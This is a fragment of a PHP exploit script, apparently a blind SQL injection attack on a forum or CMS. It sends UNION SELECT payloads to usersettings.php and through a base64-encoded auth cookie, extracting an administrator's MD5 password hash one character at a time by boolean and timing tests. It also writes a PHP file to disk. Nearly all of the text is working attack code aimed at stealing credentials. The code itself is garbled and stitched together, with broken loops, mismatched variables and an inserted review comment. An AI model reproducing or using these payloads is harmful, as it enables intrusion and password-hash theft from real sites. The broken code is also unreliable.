$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_len .= chr($i);
print chr($i);
break;
}
}
}
// Writes a minimal PHP stub ("<?php ?>") to $InterestingFile; mode 'w+' creates
// the file or truncates an existing one.
// NOTE(review): the '@' silences fopen()'s warning and the handle is never
// checked, so a failed open passes `false` into fwrite()/fclose() and execution
// continues as if the write had succeeded. Where $InterestingFile is assigned is
// not visible in this fragment — presumably earlier in the script; confirm.
$fh = @fopen($InterestingFile, 'w+');
fwrite($fh, "<?php ?>");
fclose($fh);
for ($i = 1; $i < 256; $i++) {
$chri = chr($i);
for ($j = 0; $j < 256; $j++) {
$chrj = chr($j);
for ($k = 0; $k < 256; $k++) {
$chrk = chr($k);
if($chri.$chrj.$chrk == '://') continue;
die("\n[!] wrong table prefix!");
}
$l=xtrct_lnk($_o);
if ($l==$_lnks[0]){
$f=true;
$_hash.=chr($i);
print chr($i); break;
}
}
}
if ($f==false){
$sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR 1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
$url = "http://$host:$port".$path."usersettings.php";
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
if (is_checked()) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
#if found , uncheck again
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
break;
}
if (chk_err($out)) {
die("[!] sql error.");
}
if ($difftime > ($n-1)) {
$f = true;
$_hash .= chr($i);
print "[?] hash: ".$_hash."[??]\n";
sleep($n);
break;
}
}
//uid is mediumint, so if you assign a string value to it you have an sql error, so the script fails hence true/fails questions and you bypass speed limit also
$usr = "' AND 0 UNION SELECT 3,MD5('AAAA'),null,(CASE WHEN (ASCII(SUBSTR(passwd FROM $j FOR 1))=$i) THEN '' ELSE $uid END) FROM ".$prefix."users WHERE $where LIMIT 1/*";
$out = _s($url, base64_encode($usr.":".$pwd) , 0, "");
if (chk_err($out)) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
break;
}
}
}